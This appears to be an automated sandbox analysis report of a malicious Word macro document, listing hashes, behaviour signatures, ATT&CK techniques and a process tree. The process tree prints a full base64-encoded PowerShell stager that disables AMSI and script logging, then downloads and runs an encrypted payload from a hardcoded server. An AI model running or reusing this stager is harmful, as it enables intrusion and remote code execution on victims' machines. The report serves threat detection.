759b48cb59e0c8bef80a7f181027dedce6579aababfd19dd6fb78dfc1fd10aa6

General

Target

ee9da2b43f42748015ec1c0bda2fa6aa_JaffaCakes118.doc
Size

44KB
MD5

ee9da2b43f42748015ec1c0bda2fa6aa
SHA1

286ce8290e686b338020b7952df9bda9db87f291
SHA256

759b48cb59e0c8bef80a7f181027dedce6579aababfd19dd6fb78dfc1fd10aa6
SHA512

ff60977e8ccc3e4203f144279cef1c3ccbeeb5ef15f68788a307a9e02a6708a1da984b8a1a8bfa2490ae94c32c1f980468f0f1a4db9daba7c95bda7d4042c2b2
SSDEEP

384:wKn8iSUR/8dA4qNLi08krWuHzQjbuMZZzkExygcPEdEsKhb2YOPygdP0jZPtI:1/qvaLiEMbZZ19yhEd6yPJJa

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://54.244.182.87:80

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	3044	powershell.exe	32

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	2716	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2248	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2248	WINWORD.EXE
2248	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 2576	2248	WINWORD.EXE	36
PID 2248 wrote to memory of 2576	2248	WINWORD.EXE	36
PID 2248 wrote to memory of 2576	2248	WINWORD.EXE	36
PID 2248 wrote to memory of 2576	2248	WINWORD.EXE	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee9da2b43f42748015ec1c0bda2fa6aa_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBJAG8ATgBUAEEAQgBsAGUALgBQAFMAVgBFAFIAcwBJAE8ATgAuAE0AQQBqAE8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBiAEwAeQAuAEcARQBUAFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAdABWAEEAbAB1AGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBMAD0AWwBDAE8AbABsAEUAQwBUAEkATwBuAHMALgBHAEUAbgBlAHIASQBDAC4ARABpAGMAVABJAE8AbgBhAFIAWQBbAHMAdABSAGkAbgBnACwAUwB5AFMAdABlAE0ALgBPAGIASgBFAGMAVABdAF0AOgA6AG4AZQB3ACgAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEAbAB9AEUATABzAEUAewBbAFMAQwBSAEkAUABUAEIAbABPAEMASwBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAVQBlACgAJABuAHUAbABMACwAKABOAEUAdwAtAE8AYgBKAGUAQwB0ACAAQwBvAGwAbABFAGMAdABJAE8AbgBzAC4ARwBFAG4ARQByAGkAQwAuAEgAYQBzAEgAUwBFAFQAWwBTAFQAcgBpAE4AZwBdACkAKQB9AFsAUgBFAGYAXQAuAEEAUwBzAEUAbQBCAEwAeQAuAEcAZQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBJAEUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAEEAbAB1AGUAKAAkAE4AdQBsAEwALAAkAFQAUgBVAEUAKQB9ADsAfQA7AFsAUwBZAHMAdABFAG0ALgBOAEUAdAAuAFMAZQByAHYASQBDAGUAUABvAEkAbgBUAE0AYQBuAEEAZwBlAFIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBPAE4AVABJAG4AVQBlAD0AMAA7ACQAdwBDAD0ATgBlAFcALQBPAGIAagBFAEMAVAAgAFMAWQBzAHQARQBtAC4ATgBFAHQALgBXAEUAYgBDAGwAaQBFAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBhAEQAZQBSAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBPAHgAWQA9AFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBiAFIAZQBxAFUARQBTAHQAXQA6ADoARABFAGYAYQB1AGwAdABXAGUAQgBQAFIATwB4AHkAOwAkAHcAQwAuAFAAUgBPAFgAeQAuAEMAUgBFAEQARQBuAFQASQBhAEwAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAFIAZQBkAEUAbgBUAEkAQQBsAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBBAFUATABUAE4ARQB0AHcAbwBSAEsAQwBSAGUAZABFAE4AdABJAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAFMAVABlAE0ALgBUAEUAeAB0AC4ARQBOAEMAbwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQBUAGUAcwAoACcAPQBWAE8AMwB6AFoANQAxACEASABVAEQAYQBfAGsAPABpAH4AVAB4ACYAKgBtAGwAdQBqAC0AYgAlAFkAfAB0ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8ANQA0AC4AMgA0ADQALgAxADgAMgAuADgANwA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABXAEMALgBIAGUAYQBkAGUAcgBTAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBXAEYAaABZAFEASwBFAFYAZwA0AHMATQB6AEYAMAArAEIAMgA5AGoAYgBZAEUAKwBRACsAVQA9ACIAKQA7ACQARABBAHQAQQA9ACQAVwBDAC4ARABPAFcATgBsAG8AYQBEAEQAQQBUAGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAEkAVgA9ACQARABBAFQAYQBbADAALgAuADMAXQA7ACQAZABBAHQAYQA9ACQARABhAFQAQQBbADQALgAuACQARABBAFQAYQAuAGwAZQBOAGcAVABoAF0AOwAtAGoAbwBpAE4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAFQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
7f293408df22397e8a6468803664997a

SHA1
27bd89851866eec0e38835129e7fa21530215f71

SHA256
31c363c38715e5da04f3930f1a6924394fcd04aa5487bdeab6acefb69622fbac

SHA512
b41528e36b15a22db6047b92eae8ff258f9e780d32682241a57b2879a029fe153929142dbcceab3bb9649a861b54073e1d6e3877e9236b4ee102407ff743ed86

Download Submit
memory/2248-0-0x000000002FE81000-0x000000002FE82000-memory.dmp

Filesize
4KB

Download
memory/2248-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2248-2-0x000000007123D000-0x0000000071248000-memory.dmp

Filesize
44KB

Download
memory/2248-13-0x00000000059B0000-0x0000000005AB0000-memory.dmp

Filesize
1024KB

Download
memory/2248-14-0x00000000059B0000-0x0000000005AB0000-memory.dmp

Filesize
1024KB

Download
memory/2248-26-0x000000007123D000-0x0000000071248000-memory.dmp

Filesize
44KB

Download
memory/2248-27-0x00000000059B0000-0x0000000005AB0000-memory.dmp

Filesize
1024KB

Download
memory/2248-43-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2716-20-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2716-21-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing